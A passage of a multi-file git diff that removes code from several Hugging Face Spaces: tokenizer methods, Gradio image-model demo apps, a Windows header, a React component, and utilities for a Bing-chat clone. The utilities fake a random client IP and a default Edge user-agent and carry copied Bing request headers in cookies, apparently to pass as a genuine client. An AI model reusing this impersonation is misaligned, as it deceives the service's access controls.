- A RoBERTa sequence has the following format: - single sequence: ``<s> X </s>`` - pair of sequences: ``<s> A </s></s> B </s>`` - """ - if token_ids_1 is None: - return token_ids_0 - return token_ids_0 + token_ids_1 - - def get_special_tokens_mask( - self, token_ids_0, token_ids_1=None, already_has_special_tokens=False - ): - """ - Retrieves sequence ids from a token list that has no special tokens added. This method is called when adding - special tokens using the tokenizer ``prepare_for_model`` or ``encode_plus`` methods. - - Args: - token_ids_0: list of ids (must not contain special tokens) - token_ids_1: Optional list of ids (must not contain special tokens), necessary when fetching sequence ids - for sequence pairs - already_has_special_tokens: (default False) Set to True if the token list is already formatted with - special tokens for the model - - Returns: - A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token. - """ - return [0] * ((len(token_ids_1) if token_ids_1 else 0) + len(token_ids_0)) - - def convert_ids_to_tokens(self, ids, skip_special_tokens=False): - """Converts a single index or a sequence of indices (integers) to a token - (resp. a sequence of tokens (str)), using the vocabulary and added tokens. - - Args: - skip_special_tokens: Don't decode special tokens (self.all_special_tokens). Default: False - """ - if isinstance(ids, int): - if ids in self.added_tokens_decoder: - return self.added_tokens_decoder[ids] - else: - return self._convert_id_to_token(ids) - tokens = [] - for index in ids: - index = int(index) - if skip_special_tokens and index in self.all_special_ids: - continue - if index in self.added_tokens_decoder: - tokens.append(self.added_tokens_decoder[index]) - else: - tokens.append(self._convert_id_to_token(index)) - return tokens - - def _convert_id_to_token(self, index): - raise NotImplementedError - - def convert_tokens_to_string(self, tokens): - """Converts a sequence of tokens (string) to a single string. 
- The simplest way to do it is ' '.join(self.convert_ids_to_tokens(token_ids)) - but we often want to remove sub-word tokenization artifacts at the same time. - """ - return " ".join(self.convert_ids_to_tokens(tokens)) - - def decode( - self, token_ids, skip_special_tokens=False, clean_up_tokenization_spaces=True - ): - """ - Converts a sequence of ids (integers) to a string, using the tokenizer and vocabulary - with options to remove special tokens and clean up tokenization spaces. - Similar to doing ``self.convert_tokens_to_string(self.convert_ids_to_tokens(token_ids))``. - - Args: - token_ids: list of tokenized input ids. Can be obtained using the `encode` or `encode_plus` methods. - skip_special_tokens: if set to True, will remove special tokens from the output. - clean_up_tokenization_spaces: if set to True, will clean up the tokenization spaces. - """ - filtered_tokens = self.convert_ids_to_tokens( - token_ids, skip_special_tokens=skip_special_tokens - ) - - # To avoid mixing byte-level and unicode for byte-level BPE - # we need to build the string separately for added tokens and byte-level tokens - # cf. https://github.com/huggingface/transformers/issues/1133 - sub_texts = [] - current_sub_text = [] - for token in filtered_tokens: - if skip_special_tokens and token in self.all_special_tokens: - continue - if token in self.added_tokens_encoder: - if current_sub_text: - sub_texts.append(self.convert_tokens_to_string(current_sub_text)) - current_sub_text = [] - sub_texts.append(token) - else: - current_sub_text.append(token) - if current_sub_text: - sub_texts.append(self.convert_tokens_to_string(current_sub_text)) - text = " ".join(sub_texts) - - if clean_up_tokenization_spaces: - clean_text = self.clean_up_tokenization(text) - return clean_text - else: - return text - - @property - def special_tokens_map(self): - """A dictionary mapping special token class attributes (cls_token, unk_token...) to their - values ('<unk>', '<cls>'...) 
- """ - set_attr = {} - for attr in self.SPECIAL_TOKENS_ATTRIBUTES: - attr_value = getattr(self, "_" + attr) - if attr_value: - set_attr[attr] = attr_value - return set_attr - - @property - def all_special_tokens(self): - """List all the special tokens ('<unk>', '<cls>'...) mapped to class attributes - (cls_token, unk_token...). - """ - all_toks = [] - set_attr = self.special_tokens_map - for attr_value in set_attr.values(): - all_toks = all_toks + ( - list(attr_value) - if isinstance(attr_value, (list, tuple)) - else [attr_value] - ) - all_toks = list(set(all_toks)) - return all_toks - - @property - def all_special_ids(self): - """List the vocabulary indices of the special tokens ('<unk>', '<cls>'...) mapped to - class attributes (cls_token, unk_token...). - """ - all_toks = self.all_special_tokens - all_ids = self.convert_tokens_to_ids(all_toks) - return all_ids - - @staticmethod - def clean_up_tokenization(out_string): - """Clean up a list of simple English tokenization artifacts like spaces before punctuation and abbreviated forms.""" - out_string = ( - out_string.replace(" .", ".") - .replace(" ?", "?") - .replace(" !", "!") - .replace(" ,", ",") - .replace(" ' ", "'") - .replace(" n't", "n't") - .replace(" 'm", "'m") - .replace(" do not", " don't") - .replace(" 's", "'s") - .replace(" 've", "'ve") - .replace(" 're", "'re") - ) - return out_string - - -class PreTrainedTokenizerFast(PreTrainedTokenizer): - - model_input_names = ["token_type_ids", "attention_mask"] - - def __init__(self, tokenizer: BaseTokenizer, **kwargs): - if tokenizer is None: - raise ValueError("Provided tokenizer cannot be None") - self._tokenizer = tokenizer - - super().__init__(**kwargs) - self.max_len_single_sentence = self.max_len - self.num_added_tokens( - False - ) # take into account special tokens - self.max_len_sentences_pair = self.max_len - self.num_added_tokens( - True - ) # take into account special tokens - - @property - def tokenizer(self): - return self._tokenizer - - @property - def 
decoder(self): - return self._tokenizer._tokenizer.decoder - - @property - def vocab_size(self): - return self._tokenizer.get_vocab_size(with_added_tokens=False) - - def __len__(self): - return self._tokenizer.get_vocab_size(with_added_tokens=True) - - @PreTrainedTokenizer.bos_token.setter - def bos_token(self, value): - self._bos_token = value - self._update_special_tokens() - - @PreTrainedTokenizer.eos_token.setter - def eos_token(self, value): - self._eos_token = value - self._update_special_tokens() - - @PreTrainedTokenizer.unk_token.setter - def unk_token(self, value): - self._unk_token = value - self._update_special_tokens() - - @PreTrainedTokenizer.sep_token.setter - def sep_token(self, value): - self._sep_token = value - self._update_special_tokens() - - @PreTrainedTokenizer.pad_token.setter - def pad_token(self, value): - self._pad_token = value - self._update_special_tokens() - - @PreTrainedTokenizer.cls_token.setter - def cls_token(self, value): - self._cls_token = value - self._update_special_tokens() - - @PreTrainedTokenizer.mask_token.setter - def mask_token(self, value): - self._mask_token = value - self._update_special_tokens() - - @PreTrainedTokenizer.additional_special_tokens.setter - def additional_special_tokens(self, value): - self._additional_special_tokens = value - self._update_special_tokens() - - def _update_special_tokens(self): - if self._tokenizer is not None: - self._tokenizer.add_special_tokens(self.all_special_tokens) - - def _convert_encoding( - self, - encoding, - return_tensors=None, - return_token_type_ids=None, - return_attention_mask=None, - return_overflowing_tokens=False, - return_special_tokens_mask=False, - return_offsets_mapping=False, - ): - if return_token_type_ids is None: - return_token_type_ids = "token_type_ids" in self.model_input_names - if return_attention_mask is None: - return_attention_mask = "attention_mask" in self.model_input_names - - if return_overflowing_tokens and encoding.overflowing is not None: - 
encodings = [encoding] + encoding.overflowing - else: - encodings = [encoding] - - encoding_dict = defaultdict(list) - for e in encodings: - encoding_dict["input_ids"].append(e.ids) - - if return_token_type_ids: - encoding_dict["token_type_ids"].append(e.type_ids) - if return_attention_mask: - encoding_dict["attention_mask"].append(e.attention_mask) - if return_special_tokens_mask: - encoding_dict["special_tokens_mask"].append(e.special_tokens_mask) - if return_offsets_mapping: - encoding_dict["offset_mapping"].append( - [e.original_str.offsets(o) for o in e.offsets] - ) - - # Prepare inputs as tensors if asked - if return_tensors == "tf" and is_tf_available(): - encoding_dict["input_ids"] = tf.constant(encoding_dict["input_ids"]) - if "token_type_ids" in encoding_dict: - encoding_dict["token_type_ids"] = tf.constant( - encoding_dict["token_type_ids"] - ) - - if "attention_mask" in encoding_dict: - encoding_dict["attention_mask"] = tf.constant( - encoding_dict["attention_mask"] - ) - - elif return_tensors == "pt" and is_torch_available(): - encoding_dict["input_ids"] = torch.tensor(encoding_dict["input_ids"]) - if "token_type_ids" in encoding_dict: - encoding_dict["token_type_ids"] = torch.tensor( - encoding_dict["token_type_ids"] - ) - - if "attention_mask" in encoding_dict: - encoding_dict["attention_mask"] = torch.tensor( - encoding_dict["attention_mask"] - ) - elif return_tensors is not None: - logger.warning( - "Unable to convert output to tensors format {}, PyTorch or TensorFlow is not available.".format( - return_tensors - ) - ) - - return encoding_dict - - def _convert_token_to_id_with_added_voc(self, token): - id = self._tokenizer.token_to_id(token) - if id is None: - return self.unk_token_id - return id - - def _convert_id_to_token(self, index): - return self._tokenizer.id_to_token(int(index)) - - def convert_tokens_to_string(self, tokens): - return self._tokenizer.decode(tokens) - - def add_tokens(self, new_tokens): - if isinstance(new_tokens, str): - 
new_tokens = [new_tokens] - return self._tokenizer.add_tokens(new_tokens) - - def add_special_tokens(self, special_tokens_dict): - added = super().add_special_tokens(special_tokens_dict) - self._update_special_tokens() - return added - - def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None): - if token_ids_1 is None: - return token_ids_0 - else: - return token_ids_0 + token_ids_1 - - def num_added_tokens(self, pair=False): - return self.tokenizer.num_special_tokens_to_add(pair) - - def tokenize(self, text, **kwargs): - return self.tokenizer.encode(text).tokens - - def batch_encode_plus( - self, - batch_text_or_text_pairs: Optional[Union[List[str], List[Tuple[str]]]] = None, - add_special_tokens: bool = True, - max_length: Optional[int] = None, - stride: int = 0, - truncation_strategy: str = "longest_first", - pad_to_max_length: bool = False, - return_tensors: Optional[str] = None, - return_token_type_ids: Optional[bool] = None, - return_attention_mask: Optional[bool] = None, - return_overflowing_tokens: bool = False, - return_special_tokens_mask: bool = False, - return_offsets_mapping: bool = False, - **kwargs - ): - if not add_special_tokens: - logger.warning( - "Fast tokenizers add special tokens by default. To remove special tokens, please specify " - "`add_special_tokens=False` during the initialisation rather than when calling `encode`, " - "`encode_plus` or `batch_encode_plus`." 
- ) - - # Needed if we have to return a tensor - pad_to_max_length = pad_to_max_length or (return_tensors is not None) - - # Throw an error if we can't pad because there is no padding token - if pad_to_max_length and self.pad_token_id is None: - raise ValueError( - "Unable to set proper padding strategy as the tokenizer does not have a padding token" - ) - - # Set the truncation and padding strategy, and restore the initial configuration afterwards - with truncate_and_pad( - tokenizer=self._tokenizer, - max_length=max_length, - stride=stride, - strategy=truncation_strategy, - pad_to_max_length=pad_to_max_length, - padding_side=self.padding_side, - pad_token_id=self.pad_token_id, - pad_token_type_id=self.pad_token_type_id, - pad_token=self._pad_token, - ): - - if not isinstance(batch_text_or_text_pairs, list): - raise TypeError( - "batch_text_or_text_pairs has to be a list (got {})".format( - type(batch_text_or_text_pairs) - ) - ) - - # Avoid thread overhead if only one example. - if len(batch_text_or_text_pairs) == 1: - if isinstance(batch_text_or_text_pairs[0], (tuple, list)): - tokens = self._tokenizer.encode(*batch_text_or_text_pairs[0]) - else: - tokens = self._tokenizer.encode(batch_text_or_text_pairs[0]) - tokens = [tokens] - else: - tokens = self._tokenizer.encode_batch(batch_text_or_text_pairs) - - # Convert encoding to dict - tokens = [ - self._convert_encoding( - encoding=encoding, - return_tensors=return_tensors, - return_token_type_ids=return_token_type_ids, - return_attention_mask=return_attention_mask, - return_overflowing_tokens=return_overflowing_tokens, - return_special_tokens_mask=return_special_tokens_mask, - return_offsets_mapping=return_offsets_mapping, - ) - for encoding in tokens - ] - - # Sanitize the output to have dict[list] from list[dict] - sanitized = {} - for key in tokens[0].keys(): - stack = [e for item in tokens for e in item[key]] - if return_tensors == "tf": - stack = tf.stack(stack, axis=0) - elif return_tensors == "pt": - stack = 
torch.stack(stack, dim=0) - elif not return_tensors and len(stack) == 1: - stack = stack[0] - - sanitized[key] = stack - - # If returning overflowing tokens, we need to return a mapping - # from the batch idx to the original sample - if return_overflowing_tokens: - overflow_to_sample_mapping = [ - i if len(item["input_ids"]) == 1 else [i] * len(item["input_ids"]) - for i, item in enumerate(tokens) - ] - sanitized["overflow_to_sample_mapping"] = overflow_to_sample_mapping - return sanitized - - def encode_plus( - self, - text: str, - text_pair: Optional[str] = None, - add_special_tokens: bool = False, - max_length: Optional[int] = None, - pad_to_max_length: bool = False, - stride: int = 0, - truncation_strategy: str = "longest_first", - return_tensors: Optional[str] = None, - return_token_type_ids: Optional[bool] = None, - return_attention_mask: Optional[bool] = None, - return_overflowing_tokens: bool = False, - return_special_tokens_mask: bool = False, - return_offsets_mapping: bool = False, - **kwargs - ): - batched_input = [(text, text_pair)] if text_pair else [text] - batched_output = self.batch_encode_plus( - batched_input, - add_special_tokens=add_special_tokens, - max_length=max_length, - stride=stride, - truncation_strategy=truncation_strategy, - return_tensors=return_tensors, - return_token_type_ids=return_token_type_ids, - return_attention_mask=return_attention_mask, - return_overflowing_tokens=return_overflowing_tokens, - return_special_tokens_mask=return_special_tokens_mask, - return_offsets_mapping=return_offsets_mapping, - pad_to_max_length=pad_to_max_length, - **kwargs, - ) - - # If return_tensors is None, we can remove the leading batch axis - if not return_tensors: - return { - key: value[0] if isinstance(value[0], list) else value - for key, value in batched_output.items() - } - else: - return batched_output - - def decode( - self, token_ids, skip_special_tokens=False, clean_up_tokenization_spaces=True - ): - text = 
self.tokenizer.decode(token_ids, skip_special_tokens) - - if clean_up_tokenization_spaces: - clean_text = self.clean_up_tokenization(text) - return clean_text - else: - return text - - def save_vocabulary(self, save_directory): - if os.path.isdir(save_directory): - files = self._tokenizer.save(save_directory) - else: - folder, file = os.path.split(os.path.abspath(save_directory)) - files = self._tokenizer.save(folder, name=file) - - return tuple(files) - - -def trim_batch( - input_ids, - pad_token_id, - attention_mask=None, -): - """Remove columns that are populated exclusively by pad_token_id""" - keep_column_mask = input_ids.ne(pad_token_id).any(dim=0) - if attention_mask is None: - return input_ids[:, keep_column_mask] - else: - return (input_ids[:, keep_column_mask], attention_mask[:, keep_column_mask]) diff --git a/spaces/aliceoq/vozes-da-loirinha/i18n.py b/spaces/aliceoq/vozes-da-loirinha/i18n.py deleted file mode 100644 index 37f310fadd0b48b2f364877158fb2105d645fc03..0000000000000000000000000000000000000000 --- a/spaces/aliceoq/vozes-da-loirinha/i18n.py +++ /dev/null @@ -1,28 +0,0 @@ -import locale -import json -import os - - -def load_language_list(language): - with open(f"./i18n/{language}.json", "r", encoding="utf-8") as f: - language_list = json.load(f) - return language_list - - -class I18nAuto: - def __init__(self, language=None): - if language in ["Auto", None]: - language = locale.getdefaultlocale()[ - 0 - ] # getlocale can't identify the system's language ((None, None)) - if not os.path.exists(f"./i18n/{language}.json"): - language = "en_US" - self.language = language - # print("Use Language:", language) - self.language_map = load_language_list(language) - - def __call__(self, key): - return self.language_map.get(key, key) - - def print(self): - print("Use Language:", self.language) diff --git a/spaces/allknowingroger/Image-Models-Test197/app.py b/spaces/allknowingroger/Image-Models-Test197/app.py deleted file mode 100644 index 
4e9207f1252a5154dcfd3befe910becd01304e50..0000000000000000000000000000000000000000 --- a/spaces/allknowingroger/Image-Models-Test197/app.py +++ /dev/null @@ -1,144 +0,0 @@ -import gradio as gr -# import os -# import sys -# from pathlib import Path -import time - -models =[ - "artificialguybr/CuteCartoonRedmond-V2", - "Yntec/3DRendering", - "lixiao/sdxl-bg_0201-lora-sdxl", - "JassTxM/my-pet-dog", - "vivym/chessman-sd2.1-lora-00", - "Ailyth/Toro_cat", - "DeadfoxX/glitch_lora", - "Varnii/alex_sdxl", - "artificialguybr/StoryBookRedmond-V2", -] - - -model_functions = {} -model_idx = 1 -for model_path in models: - try: - model_functions[model_idx] = gr.Interface.load(f"models/{model_path}", live=False, preprocess=True, postprocess=False) - except Exception as error: - def the_fn(txt): - return None - model_functions[model_idx] = gr.Interface(fn=the_fn, inputs=["text"], outputs=["image"]) - model_idx += 1 - - -def send_it_idx(idx): - def send_it_fn(prompt): - # model_functions is keyed by int indices, so look up with ints (fall back to the first model) - output = (model_functions.get(idx) or model_functions.get(1))(prompt) - return output - return send_it_fn - -def get_prompts(prompt_text): - return prompt_text - -def clear_it(val): - if int(val) != 0: - val = 0 - else: - val = 0 - pass - return val - -def all_task_end(cnt,t_stamp): - to = t_stamp + 60 - et = time.time() - if et > to and t_stamp != 0: - d = gr.update(value=0) - tog = gr.update(value=1) - #print(f'to: {to} et: {et}') - else: - if cnt != 0: - d = gr.update(value=et) - else: - d = gr.update(value=0) - tog = gr.update(value=0) - #print (f'passing: to: {to} et: {et}') - pass - return d, tog - -def all_task_start(): - print("\n\n\n\n\n\n\n") - t = time.gmtime() - t_stamp = time.time() - current_time = time.strftime("%H:%M:%S", t) - return gr.update(value=t_stamp), gr.update(value=t_stamp), gr.update(value=0) - -def clear_fn(): - nn = len(models) - return tuple([None, *[None for _ in range(nn)]]) - - - -with gr.Blocks(title="SD Models") as my_interface: - with gr.Column(scale=12): - # with gr.Row(): 
- # gr.Markdown("""- Primary prompt: what you want to draw (English words, e.g. a cat; adding English commas works better; click the Improve button to refine it)\n- Real prompt: the refined prompt; once it appears, click the Run button on the right to start""") - with gr.Row(): - with gr.Row(scale=6): - primary_prompt=gr.Textbox(label="Prompt", value="") - # real_prompt=gr.Textbox(label="Real prompt") - with gr.Row(scale=6): - # improve_prompts_btn=gr.Button("Improve") - with gr.Row(): - run=gr.Button("Run",variant="primary") - clear_btn=gr.Button("Clear") - with gr.Row(): - sd_outputs = {} - model_idx = 1 - for model_path in models: - with gr.Column(scale=3, min_width=320): - with gr.Box(): - sd_outputs[model_idx] = gr.Image(label=model_path) - pass - model_idx += 1 - pass - pass - - with gr.Row(visible=False): - start_box=gr.Number(interactive=False) - end_box=gr.Number(interactive=False) - tog_box=gr.Textbox(value=0,interactive=False) - - start_box.change( - all_task_end, - [start_box, end_box], - [start_box, tog_box], - every=1, - show_progress=False) - - primary_prompt.submit(all_task_start, None, [start_box, end_box, tog_box]) - run.click(all_task_start, None, [start_box, end_box, tog_box]) - runs_dict = {} - model_idx = 1 - for model_path in models: - runs_dict[model_idx] = run.click(model_functions[model_idx], inputs=[primary_prompt], outputs=[sd_outputs[model_idx]]) - model_idx += 1 - pass - pass - - # improve_prompts_btn_clicked=improve_prompts_btn.click( - # get_prompts, - # inputs=[primary_prompt], - # outputs=[primary_prompt], - # cancels=list(runs_dict.values())) - clear_btn.click( - clear_fn, - None, - [primary_prompt, *list(sd_outputs.values())], - cancels=[*list(runs_dict.values())]) - tog_box.change( - clear_it, - tog_box, - tog_box, - cancels=[*list(runs_dict.values())]) - -my_interface.queue(concurrency_count=600, status_update_rate=1) -my_interface.launch(inline=True, show_api=False) - \ No newline at end of file diff --git a/spaces/amarchheda/ChordDuplicate/portaudio/src/hostapi/wasapi/mingw-include/propkeydef.h 
b/spaces/amarchheda/ChordDuplicate/portaudio/src/hostapi/wasapi/mingw-include/propkeydef.h deleted file mode 100644 index a361044e56a71f1139e10d0fd1d9579c75a1ec2b..0000000000000000000000000000000000000000 --- a/spaces/amarchheda/ChordDuplicate/portaudio/src/hostapi/wasapi/mingw-include/propkeydef.h +++ /dev/null @@ -1,26 +0,0 @@ -#ifndef PID_FIRST_USABLE -#define PID_FIRST_USABLE 2 -#endif - -#ifndef REFPROPERTYKEY -#ifdef __cplusplus -#define REFPROPERTYKEY const PROPERTYKEY & -#else // !__cplusplus -#define REFPROPERTYKEY const PROPERTYKEY * __MIDL_CONST -#endif // __cplusplus -#endif //REFPROPERTYKEY - -#ifdef DEFINE_PROPERTYKEY -#undef DEFINE_PROPERTYKEY -#endif - -#ifdef INITGUID -#define DEFINE_PROPERTYKEY(name, l, w1, w2, b1, b2, b3, b4, b5, b6, b7, b8, pid) EXTERN_C const PROPERTYKEY DECLSPEC_SELECTANY name = { { l, w1, w2, { b1, b2, b3, b4, b5, b6, b7, b8 } }, pid } -#else -#define DEFINE_PROPERTYKEY(name, l, w1, w2, b1, b2, b3, b4, b5, b6, b7, b8, pid) EXTERN_C const PROPERTYKEY name -#endif // INITGUID - -#ifndef IsEqualPropertyKey -#define IsEqualPropertyKey(a, b) (((a).pid == (b).pid) && IsEqualIID((a).fmtid, (b).fmtid) ) -#endif // IsEqualPropertyKey - diff --git a/spaces/animeartstudio/ArtModels/app.py b/spaces/animeartstudio/ArtModels/app.py deleted file mode 100644 index 38b9f89ba979227ba5c3e32fd194fceaacb23e6a..0000000000000000000000000000000000000000 --- a/spaces/animeartstudio/ArtModels/app.py +++ /dev/null @@ -1,130 +0,0 @@ -import gradio as gr -import os -import sys -from pathlib import Path - -models = [ - {"name": "Anything Midjourney 4.1", "url": "Joeythemonster/anything-midjourney-v-4-1"}, - {"name": "Chaos and Order", "url": "Guizmus/SDArt_ChaosAndOrder768"}, - {"name": "Chilloutclara", "url": "Fred99774/chilloutvlara"}, - {"name": "Comic Diffusion", "url": "ogkalu/Comic-Diffusion"}, - {"name": "Cosmic Horros 768", "url": "Guizmus/SDArt_cosmichorrors768"}, - {"name": "Cosmic Horros", "url": "Guizmus/SDArt_cosmichorrors"}, - {"name": 
"DGSpitzer", "url": "DGSpitzer/DGSpitzer-Art-Diffusion"}, - {"name": "Dungeons and Diffusion", "url": "0xJustin/Dungeons-and-Diffusion"}, - {"name": "Elden Ring", "url": "nitrosocke/elden-ring-diffusion"}, - {"name": "Epic Diffusion 1.1", "url": "johnslegers/epic-diffusion-v1.1"}, - {"name": "Epic Diffusion", "url": "johnslegers/epic-diffusion"}, - {"name": "EpicMix Realism", "url": "Duskfallcrew/EpicMix_Realism"}, - {"name": "Fantasy Mix", "url": "theintuitiveye/FantasyMix"}, - {"name": "Girl New 1", "url": "Fred99774/girlnew1"}, - {"name": "Lit 6B", "url": "hakurei/lit-6B"}, - {"name": "Luna Diffusion", "url": "proximasanfinetuning/luna-diffusion"}, - {"name": "Midjourney 4.0", "url": "flax/midjourney-v4-diffusion"}, - {"name": "Midjourney 4.1", "url": "Joeythemonster/anything-midjourney-v-4-1"}, - {"name": "Mo-Di Diffusion", "url": "nitrosocke/mo-di-diffusion"}, - {"name": "Nitro Diffusion", "url": "nitrosocke/Nitro-Diffusion"}, - {"name": "Openjourney V2", "url": "prompthero/openjourney-v2"}, - {"name": "Openjourney", "url": "prompthero/openjourney"}, - {"name": "Seek Art Mega", "url": "coreco/seek.art_MEGA"}, - {"name": "Something", "url": "Guizmus/SDArt_something"}, - {"name": "Spider Verse diffusion", "url": "nitrosocke/spider-verse-diffusion"}, - {"name": "Vintedois 1.0", "url": "22h/vintedois-diffusion-v0-1"}, - {"name": "Vintedois 2.0", "url": "22h/vintedois-diffusion-v0-2"}, - {"name": "❤ ART STYLES ==========", "url": "joachimsallstrom/Double-Exposure-Diffusion"}, - {"name": "Balloon Art", "url": "Fictiverse/Stable_Diffusion_BalloonArt_Model"}, - {"name": "Double Exposure Diffusion", "url": "joachimsallstrom/Double-Exposure-Diffusion"}, - {"name": "Fluid Art", "url": "Fictiverse/Stable_Diffusion_FluidArt_Model"}, - {"name": "GTA5 Artwork Diffusion", "url": "ItsJayQz/GTA5_Artwork_Diffusion"}, - {"name": "Marvel WhatIf Diffusion", "url": "ItsJayQz/Marvel_WhatIf_Diffusion"}, - {"name": "Naruto Diffuser", "url": "lambdalabs/sd-naruto-diffusers"}, - {"name": 
"Papercut", "url": "Fictiverse/Stable_Diffusion_PaperCut_Model"}, - {"name": "Pokemon Diffuser", "url": "lambdalabs/sd-pokemon-diffusers"}, - {"name": "Synthwave Punk 2", "url": "ItsJayQz/SynthwavePunk-v2"}, - {"name": "Valorant Diffusion", "url": "ItsJayQz/Valorant_Diffusion"}, - {"name": "Van Gogh Diffusion", "url": "dallinmackay/Van-Gogh-diffusion"}, - {"name": "Vectorartz Diffusion", "url": "coder119/Vectorartz_Diffusion"}, - {"name": "VoxelArt", "url": "Fictiverse/Stable_Diffusion_VoxelArt_Model"}, -] - -current_model = models[0] - -text_gen = gr.Interface.load("spaces/daspartho/prompt-extend") - -models2 = [] -for model in models: - model_url = f"models/{model['url']}" - loaded_model = gr.Interface.load(model_url, live=True, preprocess=True) - models2.append(loaded_model) - - -def text_it(inputs, text_gen=text_gen): - return text_gen(inputs) - - -def set_model(current_model_index): - global current_model - current_model = models[current_model_index] - return gr.update(value=f"{current_model['name']}") - - -def send_it(inputs, model_choice): - proc = models2[model_choice] - return proc(inputs) - - -with gr.Blocks() as myface: - gr.HTML( - - ) - - with gr.Row(): - with gr.Row(): - input_text = gr.Textbox(label="Prompt idea", placeholder="Eg. 
Fantasy sunrise, serene", lines=1) - # Model selection dropdown - model_name1 = gr.Dropdown( - label="Choose Model", - choices=[m["name"] for m in models], - type="index", - value=current_model["name"], - interactive=True, - ) - with gr.Row(): - see_prompts = gr.Button("Generate Prompts") - run = gr.Button("Generate Images", variant="primary") - - with gr.Row(): - output1 = gr.Image(label="") - output2 = gr.Image(label="") - output3 = gr.Image(label="") - with gr.Row(): - magic1 = gr.Textbox(label="Generated Prompt", lines=2) - magic2 = gr.Textbox(label="Generated Prompt", lines=2) - magic3 = gr.Textbox(label="Generated Prompt", lines=2) - with gr.Row(): - output4 = gr.Image(label="") - output5 = gr.Image(label="") - output6 = gr.Image(label="") - with gr.Row(): - magic4 = gr.Textbox(label="Generated Prompt", lines=2) - magic5 = gr.Textbox(label="Generated Prompt", lines=2) - magic6 = gr.Textbox(label="Generated Prompt", lines=2) - - model_name1.change(set_model, inputs=model_name1, outputs=[output1, output2, output3, output4, output5, output6]) - - run.click(send_it, inputs=[magic1, model_name1], outputs=[output1]) - run.click(send_it, inputs=[magic2, model_name1], outputs=[output2]) - run.click(send_it, inputs=[magic3, model_name1], outputs=[output3]) - run.click(send_it, inputs=[magic4, model_name1], outputs=[output4]) - run.click(send_it, inputs=[magic5, model_name1], outputs=[output5]) - run.click(send_it, inputs=[magic6, model_name1], outputs=[output6]) - - see_prompts.click(text_it, inputs=[input_text], outputs=[magic1]) - see_prompts.click(text_it, inputs=[input_text], outputs=[magic2]) - see_prompts.click(text_it, inputs=[input_text], outputs=[magic3]) - see_prompts.click(text_it, inputs=[input_text], outputs=[magic4]) - see_prompts.click(text_it, inputs=[input_text], outputs=[magic5]) - see_prompts.click(text_it, inputs=[input_text], outputs=[magic6]) - -myface.queue(concurrency_count=200) -myface.launch(inline=True, show_api=False, max_threads=400) \ No 
newline at end of file diff --git a/spaces/aphenx/bingo/src/components/ui/badge.tsx b/spaces/aphenx/bingo/src/components/ui/badge.tsx deleted file mode 100644 index d9a84b394090e5b4b3bd34f6135b9a2f2ead0aa2..0000000000000000000000000000000000000000 --- a/spaces/aphenx/bingo/src/components/ui/badge.tsx +++ /dev/null @@ -1,36 +0,0 @@ -import * as React from 'react' -import { cva, type VariantProps } from 'class-variance-authority' - -import { cn } from '@/lib/utils' - -const badgeVariants = cva( - 'inline-flex items-center rounded-full border px-2.5 py-0.5 text-xs font-semibold transition-colors focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2', - { - variants: { - variant: { - default: - 'border-transparent bg-primary text-primary-foreground hover:bg-primary/80', - secondary: - 'border-transparent bg-secondary text-secondary-foreground hover:bg-secondary/80', - destructive: - 'border-transparent bg-destructive text-destructive-foreground hover:bg-destructive/80', - outline: 'text-foreground' - } - }, - defaultVariants: { - variant: 'default' - } - } -) - -export interface BadgeProps - extends React.HTMLAttributes<HTMLDivElement>, - VariantProps<typeof badgeVariants> {} - -function Badge({ className, variant, ...props }: BadgeProps) { - return ( - <div className={cn(badgeVariants({ variant }), className)} {...props} />
    - ) -} - -export { Badge, badgeVariants } diff --git a/spaces/aphenx/bingo/src/lib/utils.ts b/spaces/aphenx/bingo/src/lib/utils.ts deleted file mode 100644 index 07feedb34e356b1b3cf867872f32d47a96ae12fb..0000000000000000000000000000000000000000 --- a/spaces/aphenx/bingo/src/lib/utils.ts +++ /dev/null @@ -1,138 +0,0 @@ -import { clsx, type ClassValue } from 'clsx' -import { customAlphabet } from 'nanoid' -import { twMerge } from 'tailwind-merge' - -export function cn(...inputs: ClassValue[]) { - return twMerge(clsx(inputs)) -} - -export const nanoid = customAlphabet( - '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz', - 7 -) // 7-character random string - -export function createChunkDecoder() { - const decoder = new TextDecoder() - return function (chunk: Uint8Array | undefined): string { - if (!chunk) return '' - return decoder.decode(chunk, { stream: true }) - } -} - -export function random (start: number, end: number) { - return start + Math.ceil(Math.random() * (end - start)) -} - -export function randomIP() { - return `11.${random(104, 107)}.${random(1, 255)}.${random(1, 255)}` -} - -export function parseHeadersFromCurl(content: string) { - const re = /-H '([^:]+):\s*([^']+)/mg - const headers: HeadersInit = {} - content = content.replaceAll('-H "', '-H \'').replaceAll('" ^', '\'\\').replaceAll('^\\^"', '"') // 将 cmd curl 转成 bash curl - content.replace(re, (_: string, key: string, value: string) => { - headers[key] = value - return '' - }) - - return headers -} - -export const ChunkKeys = ['BING_HEADER', 'BING_HEADER1', 'BING_HEADER2'] -export function encodeHeadersToCookie(content: string) { - const base64Content = btoa(content) - const contentChunks = base64Content.match(/.{1,4000}/g) || [] - return ChunkKeys.map((key, index) => `${key}=${contentChunks[index] ?? 
''}`) -} - -export function extraCurlFromCookie(cookies: Partial<{ [key: string]: string }>) { - let base64Content = '' - ChunkKeys.forEach((key) => { - base64Content += (cookies[key] || '') - }) - try { - return atob(base64Content) - } catch(e) { - return '' - } -} - -export function extraHeadersFromCookie(cookies: Partial<{ [key: string]: string }>) { - return parseHeadersFromCurl(extraCurlFromCookie(cookies)) -} - -export function formatDate(input: string | number | Date): string { - const date = new Date(input) - return date.toLocaleDateString('en-US', { - month: 'long', - day: 'numeric', - year: 'numeric' - }) -} - -export function parseCookie(cookie: string, cookieName: string) { - const targetCookie = new RegExp(`(?:[; ]|^)${cookieName}=([^;]*)`).test(cookie) ? RegExp.$1 : cookie - return targetCookie ? decodeURIComponent(targetCookie).trim() : cookie.indexOf('=') === -1 ? cookie.trim() : '' -} - -export function parseCookies(cookie: string, cookieNames: string[]) { - const cookies: { [key: string]: string } = {} - cookieNames.forEach(cookieName => { - cookies[cookieName] = parseCookie(cookie, cookieName) - }) - return cookies -} - -export const DEFAULT_UA = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.0.0' -export const DEFAULT_IP = process.env.BING_IP || randomIP() - -export function parseUA(ua?: string, default_ua = DEFAULT_UA) { - return / EDGE?/i.test(decodeURIComponent(ua || 